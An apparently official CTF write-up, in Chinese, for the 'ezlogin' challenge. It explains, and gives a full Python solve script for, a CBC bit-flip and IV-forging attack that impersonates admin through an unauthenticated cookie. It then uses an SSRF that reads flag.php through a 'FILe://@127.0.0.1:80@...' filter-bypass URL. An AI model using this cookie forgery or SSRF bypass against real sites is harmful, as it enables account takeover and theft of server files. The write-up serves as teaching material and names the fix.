ezlogin



WriteUp来源

来自官方发布

https://www.xctf.org.cn/library/details/5acdc1c31cf4935ac38fce445978888a5710cf11/

题目说明

一个平平无奇的登录界面

题目考点

  • CBC字节翻转攻击（密文没有完整性校验，且 IV 由客户端 Cookie `key` 提供，服务端还会回显解密结果，可当作解密预言机）

  • SSRF攻击（利用 `file://` 协议读取服务器本地文件 `/var/www/html/flag.php`）

解题思路

整体分两步：① 用与 admin 只差一个字节的用户名 `1dmin` 登录，拿到 CBC 加密的 `user_info` Cookie 和随之下发的 IV（`key` Cookie）。翻转密文第 0 块第 9 字节，使第 1 块明文里的 `1` 变成 `a`；此时第 0 块明文被破坏，但页面会把解密后的内容回显出来，据此反推出能让第 0 块恢复为 `a:2:{s:8:"userna` 的新 IV，服务端便以 admin 身份绑定当前 PHPSESSID。② 用该会话访问 `mmman4g.php?url=`，通过 `file://` 协议读取 `/var/www/html/flag.php`。根因是密文未做 MAC/AEAD 完整性校验，且 IV 由客户端控制；修复应改用 AEAD（或 encrypt-then-MAC 覆盖 IV+密文），或干脆把用户信息放在服务端 session 里。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib
import requests
import re
import base64

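# Python 2 script: str and bytes are the same type, so the CBC arithmetic
# below indexes base64-decoded ciphertext with ord()/chr() directly.
url = "http://0.0.0.0:20001/"
BLOCK = 16  # cipher block size; the target's cookie is sliced into 16-byte blocks


def flip_byte(cipher, pos, old, new):
    """Return *cipher* with byte *pos* XORed by ord(old) ^ ord(new).

    CBC decryption computes P[i] = D(C[i]) XOR C[i-1], so XORing byte
    ``pos`` of ciphertext block i-1 flips the same byte of plaintext
    block i from ``old`` to ``new``.  Plaintext block i-1 becomes
    garbage as a side effect; the caller repairs it with forge_iv().
    """
    flipped = chr(ord(cipher[pos]) ^ ord(old) ^ ord(new))
    return cipher[:pos] + flipped + cipher[pos + 1:]


def forge_iv(leaked_plain, iv, want):
    """Return the IV that makes ciphertext block 0 decrypt to *want*.

    P[0] = D(C[0]) XOR IV, so D(C[0]) = leaked_plain XOR IV and the IV
    that yields *want* is D(C[0]) XOR want.  All three arguments are
    expected to be exactly one block long; the result has the length of
    the shortest one.
    """
    return "".join(
        chr(ord(p) ^ ord(i) ^ ord(w))
        for p, i, w in zip(leaked_plain, iv, want)
    )


def main():
    """Log in as a throwaway user, forge the admin cookie, then read flag.php via SSRF."""
    # Step 1: log in as "1dmin" -- one byte away from "admin" at a known offset.
    data = {
        "username": "1dmin",
        "password": "1231111",
        "submit": "Login",
    }
    r = requests.post(url=url, data=data, timeout=10)

    # Read the cookies by name.  Slicing the joined Set-Cookie header at
    # fixed offsets breaks as soon as the server reorders the cookies or
    # an attribute such as Expires contains ", ".
    try:
        phpsessid = r.cookies["PHPSESSID"]
        iv = base64.b64decode(urllib.unquote(r.cookies["key"]))
        cipher = base64.b64decode(urllib.unquote(r.cookies["user_info"]))
    except KeyError as missing:
        raise SystemExit("login response did not set cookie %s" % missing)
    if len(iv) != BLOCK or len(cipher) < 2 * BLOCK:
        raise SystemExit(
            "unexpected cookie layout: iv=%d bytes, cipher=%d bytes"
            % (len(iv), len(cipher))
        )

    # Step 2: the cookie is a PHP-serialised array.  Its first block is
    # 'a:2:{s:8:"userna' (see `want` below) and the second is
    # 'me";s:5:"1dmin";', so byte 9 of plaintext block 1 is the '1' we
    # want to turn into 'a'.  Flip it through byte 9 of ciphertext block 0;
    # plaintext block 0 is now garbage and must be repaired via the IV.
    cipher_new = flip_byte(cipher, 9, "1", "a")

    # Step 3: the page echoes the (garbled) decrypted cookie, base64'd, in
    # its first <p> -- a decryption oracle that leaks D(C[0]) XOR IV.
    cookie = {
        "PHPSESSID": phpsessid,
        "user_info": urllib.quote(base64.b64encode(cipher_new)),
        "key": urllib.quote(base64.b64encode(iv)),
    }
    s = requests.get(url=url, cookies=cookie, timeout=10)
    leaked = re.findall(r"<p>.*?</p>", s.content)
    if not leaked:
        raise SystemExit("no <p> in response; decryption oracle not found")
    plain = base64.b64decode(leaked[0][3:-4])[:BLOCK]
    if len(plain) != BLOCK:
        raise SystemExit("leaked plaintext is shorter than one block")
    want = 'a:2:{s:8:"userna'
    newiv = forge_iv(plain, iv, want)

    # Step 4: resend the flipped ciphertext with the repaired IV.  Because
    # the IV is client-controlled and the ciphertext carries no MAC, the
    # server now unserialises username "admin" and binds it to PHPSESSID.
    cookie["key"] = urllib.quote(base64.b64encode(newiv))
    requests.get(url=url, cookies=cookie, timeout=10)

    # Step 5: SSRF with the admin session.  The mixed-case scheme and the
    # "@127.0.0.1:80@www.harmonyos.com" userinfo look like a bypass for a
    # scheme/host filter on the fetcher (presumed; the filter is not
    # visible here), and "/.//../../" walks to the web root's flag.php.
    url2 = url + 'mmman4g.php?url=FILe://@127.0.0.1:80@www.harmonyos.com/.//../../var/www/html/flag.php'
    r = requests.get(url=url2, cookies={"PHPSESSID": phpsessid}, timeout=10)
    found = re.findall(r"'.*?}'", r.content)
    if not found:
        raise SystemExit("flag pattern not found in response:\n" + r.content)
    print('admin PHPSESSID: ' + phpsessid)
    print(found[0][1:-1])


if __name__ == "__main__":
    main()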